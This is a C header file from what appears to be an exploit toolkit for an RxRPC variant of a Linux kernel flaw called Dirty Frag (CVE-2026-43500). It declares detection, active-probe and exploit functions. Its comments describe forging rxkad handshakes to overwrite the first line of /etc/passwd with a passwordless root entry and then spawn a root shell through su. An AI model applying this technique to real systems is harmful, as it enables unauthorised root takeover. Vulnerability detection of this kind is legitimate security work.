35 lines
1.3 KiB
C
35 lines
1.3 KiB
C
/*
|
|
* DIRTYFAIL — dirtyfrag_rxrpc.h
|
|
*
|
|
* RxRPC variant of Dirty Frag (CVE-2026-43500).
|
|
*/
|
|
|
|
#ifndef DIRTYFAIL_DIRTYFRAG_RXRPC_H
|
|
#define DIRTYFAIL_DIRTYFRAG_RXRPC_H
|
|
|
|
#include "common.h"
|
|
|
|
/* Precondition probe: kernel + rxrpc.ko + AF_RXRPC openable. */
|
|
df_result_t dirtyfrag_rxrpc_detect(void);
|
|
|
|
/* Real PoC: brute-force three rxkad session keys K_A, K_B, K_C such
|
|
* that pcbc(fcrypt)-decrypting /etc/passwd line 1 at offsets 4/6/8
|
|
* with last-write-wins produces "root::0:0:GGGGGG:/root:/bin/bash".
|
|
* Then enter a fresh user/net namespace, run the three forged-handshake
|
|
* splice triggers, and (if do_shell) execve `su -` to drop a root shell
|
|
* via PAM `pam_unix nullok`. */
|
|
df_result_t dirtyfrag_rxrpc_exploit(bool do_shell);
|
|
df_result_t dirtyfrag_rxrpc_exploit_inner(void);
|
|
|
|
/* Active probe: fires ONE rxkad handshake-forgery trigger against a
|
|
* /tmp sentinel (never /etc/passwd). The trigger writes ~8 bytes of
|
|
* pcbc(fcrypt)-decrypted ciphertext into the sentinel page; we don't
|
|
* need to predict what landed — any byte change confirms the kernel
|
|
* STORE happened. Skips fcrypt brute force entirely (a random 8-byte
|
|
* key is fine for a structural probe). Returns DF_VULNERABLE if the
|
|
* sentinel changed, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */
|
|
df_result_t dirtyfrag_rxrpc_active_probe(void);
|
|
df_result_t dirtyfrag_rxrpc_active_probe_inner(void);
|
|
|
|
#endif
|